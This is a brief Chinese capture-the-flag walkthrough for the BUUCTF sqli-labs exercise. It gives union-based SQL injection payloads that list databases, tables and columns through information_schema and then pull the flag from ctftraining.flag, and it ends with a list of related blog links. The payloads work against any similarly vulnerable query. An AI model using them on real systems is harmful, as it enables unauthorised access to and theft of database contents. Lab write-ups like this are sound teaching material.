BUUCTF sqli-labs 1

这里就是单纯的找一下flag在哪,通关整个靶场在sql注入分区,虽然还没有通关。

这里要先看一下数据库都有哪些,用到语句:?id=-1' union select 1,(select group_concat(schema_name) from information_schema.schemata),3--+

发现这个数据库:ctftraining 可能有我们需要的信息

于是接着就是:

查看该数据库中都有什么表:?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='ctftraining'),3--+

发现存在flag表,接着就是要看该表的信息:?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='ctftraining' and table_name='flag'),3--+

发现就只有一列,然后就是查看该列的信息:

这里需要注意,我们要指定是ctftraining数据库的flag表,如果单纯的是flag则是查找的security.flag这时就会报错。

正确语句:?id=-1' union select 1,(select group_concat(flag) from ctftraining.flag),3--+

相关推荐
M***Z21015 小时前
SQL 建表语句详解
java·数据库·sql
b***594316 小时前
MySQL数据库(SQL分类)
数据库·sql·mysql
i***279516 小时前
MySQL 常用 SQL 语句大全
数据库·sql·mysql
IndulgeCui16 小时前
KingbaseES 数据库与用户默认表空间深度解析
数据库·sql·mysql
v***913016 小时前
DVWA靶场通关——SQL Injection篇
数据库·sql
学c菜鸟鸟16 小时前
漏洞知识——sql注入(二)
数据库·sql·oracle
眠晚晚16 小时前
API攻防&系统攻防笔记分享
笔记·web安全·网络安全
漏洞文库-Web安全16 小时前
CTF密码学之SM4
安全·web安全·网络安全·密码学·ctf
P***843917 小时前
SQL多行数据合并到一行中的一个字段
数据库·sql
L***865317 小时前
SQL 注入详解:原理、危害与防范措施
数据库·sql·oracle